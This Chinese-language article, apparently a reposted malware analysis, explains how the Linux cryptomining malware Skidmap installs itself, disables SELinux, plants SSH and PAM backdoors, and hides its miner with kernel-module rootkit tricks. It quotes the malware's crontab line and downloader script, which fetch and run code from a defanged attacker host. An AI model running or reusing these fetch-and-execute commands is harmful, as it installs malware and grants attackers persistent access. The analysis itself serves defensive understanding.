加密貨幣挖掘惡意軟件是一種普遍存在網(wǎng)絡(luò)威脅,不止是windows系統(tǒng),如今你在移動(dòng)設(shè)備、Unix和類Unix系統(tǒng),甚至是服務(wù)器和云環(huán)境中,都可以見到它們的身影。

此外,它們的反檢測(cè)能力也在不斷提高。例如,有些惡意軟件就與Watchdog(Linux看門狗)組件捆綁在一起,以確保加密貨幣挖掘活動(dòng)不會(huì)被系統(tǒng)監(jiān)控工具監(jiān)測(cè)到。

Skidmap就是這樣一種惡意軟件,借助獨(dú)特的內(nèi)核模塊加載方式,它不僅很難被檢測(cè)出來,而且還允許攻擊者不受限制地訪問受感染系統(tǒng)。

Skidmap的感染鏈

圖1.Skidmap的感染鏈

首先,Skidmap通過crontab將自己安裝到目標(biāo)機(jī)器上,如下所示:

*/1 * * * * curl -fsSL hxxp://pm[.]ipfswallet[.]tk/pm.sh | sh

接下來,Skidmap就會(huì)下載主二進(jìn)制文件“pc”:

if [ -x "/usr/bin/wget" -o -x "/bin/wget" ]; then wget -c hxxp://pm[.]ipfswallet[.]tk/pc -O /var/lib/pc && chmod +x /var/lib/pc && /var/lib/pc elif [ -x "/usr/bin/curl" -o -x "/bin/curl" ]; then curl -fs hxxp://pm[.]ipfswallet[.]tk/pc -o /var/lib/pc && chmod +x /var/lib/pc && /var/lib/pc elif [ -x "/usr/bin/get" -o -x "/bin/get" ]; then get -c hxxp://pm[.]ipfswallet[.]tk/pc -O /var/lib/pc && chmod +x /var/lib/pc && /var/lib/pc elif [ -x "/usr/bin/cur" -o -x "/bin/cur" ]; then cur -fs hxxp://pm[.]ipfswallet[.]tk/pc -o /var/lib/pc && chmod +x /var/lib/pc && /var/lib/pc else url -fs hxxp://pm[.]ipfswallet[.]tk/pc -o /var/lib/pc && chmod +x /var/lib/pc && /var/lib/pc fi

執(zhí)行二進(jìn)制文件“pc”,受感染系統(tǒng)的安全設(shè)置將被降低。

如果文件“/ usr / sbin / setenforce”存在,那么Skidmap則將執(zhí)行命令“setenforce 0”。此命令會(huì)將系統(tǒng)的Security-Enhanced Linux(SELinux)模塊配置為允許模式。

如果文件“/ etc / selinux / config”存在,那么Skidmap則會(huì)將這些命令“:SELINUX = disabled”和“SELINUXTYPE = targeted”寫入該文件。前者用于禁用SELinux策略,后者用于將選定的進(jìn)程設(shè)置為在受限域中運(yùn)行。

此外,Skidmap還會(huì)設(shè)置了一種獲取后門訪問受感染系統(tǒng)的方法。它通過讓二進(jìn)制文件將其處理程序的公鑰添加到“authorized_keys”文件來完成此操作,該文件包含身份驗(yàn)證所需的密鑰。

圖2. Skidmap獲取對(duì)受感染系統(tǒng)的后門訪問權(quán)限

除了后門訪問,Skidmap還為會(huì)攻擊者創(chuàng)建另一種訪問受感染系統(tǒng)的方法——將系統(tǒng)文件“pam_unix.so”替換為惡意版本。如圖3所示,惡意版本的“pam_unix.so”文件接受任何用戶的特定密碼,從而允許攻擊者以任何用戶身份登錄受感染系統(tǒng)。

圖3. Skidmap利用惡意版本的“pam_unix.so”文件來訪問受感染系統(tǒng)

Skidmap如何釋放加密貨幣挖掘程序

二進(jìn)制文件“pc”首先檢查受感染系統(tǒng)的操作系統(tǒng)是Debian還是RHEL/CentOS,以此來決定將要釋放的加密貨幣挖掘程序和其他組件。

對(duì)于基于Debian的系統(tǒng),它會(huì)將加密貨幣挖掘程序釋放到“/tmp/miner2”。

圖4. 二進(jìn)制文件“pc”在基于Debian的系統(tǒng)中釋放加密貨幣挖掘程序

對(duì)于基于CentOS/RHEL的系統(tǒng),它將從“hxxp://pm[.]ipfswallet[.]tk/cos7[.]tar[.]gz]”下載一個(gè)tar壓縮文件,其中就包含了加密貨幣挖掘程序和多個(gè)組件,這些組件將在解壓縮后安裝。

圖5. 二進(jìn)制文件“pc”在基于RHEL/CentOS的系統(tǒng)中釋放加密貨幣挖掘程序

Skidmap的其他惡意組件

Skidmap還有多個(gè)值得注意的組件,它們旨在進(jìn)一步隱藏加密貨幣挖掘活動(dòng):

一個(gè)惡意版本的“rm”二進(jìn)制文件

-這個(gè)文件用于替換系統(tǒng)原始的“rm”文件(rm通常用作刪除文件的命令),進(jìn)而設(shè)置一個(gè)惡意的cron定時(shí)任務(wù),可以下載并執(zhí)行文件。

圖6.惡意版本的“rm”二進(jìn)制文件設(shè)置的cron定時(shí)任務(wù)

Kaudited

-安裝為/ usr / bin / kaudited的文件。這個(gè)二進(jìn)制文件將釋放并在受感染系統(tǒng)上安裝多個(gè)可加載的內(nèi)核模塊(LKM)以及用于監(jiān)視加密貨幣挖掘程序文件和進(jìn)程的監(jiān)視程序組件。

圖7. 由Kaudited釋放的內(nèi)核模塊


圖8.由Kaudited釋放的監(jiān)視程序組件

Iproute

-這個(gè)組件掛鉤系統(tǒng)調(diào)用,使用getdents(通常用于讀取目錄的內(nèi)容)隱藏特定文件。

圖9. Iproute使用getdents隱藏特定文件

Netlink

-一個(gè)能夠偽造網(wǎng)絡(luò)流量統(tǒng)計(jì)信息(特別是涉及某些IP地址和端口的流量)以及CPU統(tǒng)計(jì)信息的組件,這將導(dǎo)致受感染系統(tǒng)的CPU使用率始終顯示為低。

圖10.用于實(shí)現(xiàn)CPU使用率始終顯示為低的代碼片段

結(jié)論

Skidmap使用了一些相對(duì)高級(jí)的方法來確保它自身及其組件很難被檢測(cè)出來,如獨(dú)特的內(nèi)核模塊加載方式。再加上能夠替換系統(tǒng)原始文件的能力,這使得它與其他惡意軟件相比更加難以被清理。

此外,Skidmap還能夠創(chuàng)建多種允許攻擊者訪問受感染系統(tǒng)的方法,這使得它即使被清理,也能夠重新感染已恢復(fù)正常的系統(tǒng),從而繼續(xù)加密貨幣挖掘活動(dòng),降低服務(wù)器或工作站的性能。

1.《skid 借你的服務(wù)器挖下礦!新型Linux惡意軟件“Skidmap”來襲》援引自互聯(lián)網(wǎng),旨在傳遞更多網(wǎng)絡(luò)信息知識(shí),僅代表作者本人觀點(diǎn),與本網(wǎng)站無(wú)關(guān),侵刪請(qǐng)聯(lián)系頁(yè)腳下方聯(lián)系方式。

2.《skid 借你的服務(wù)器挖下礦!新型Linux惡意軟件“Skidmap”來襲》僅供讀者參考,本網(wǎng)站未對(duì)該內(nèi)容進(jìn)行證實(shí),對(duì)其原創(chuàng)性、真實(shí)性、完整性、及時(shí)性不作任何保證。

3.文章轉(zhuǎn)載時(shí)請(qǐng)保留本站內(nèi)容來源地址,http://f99ss.com/keji/345800.html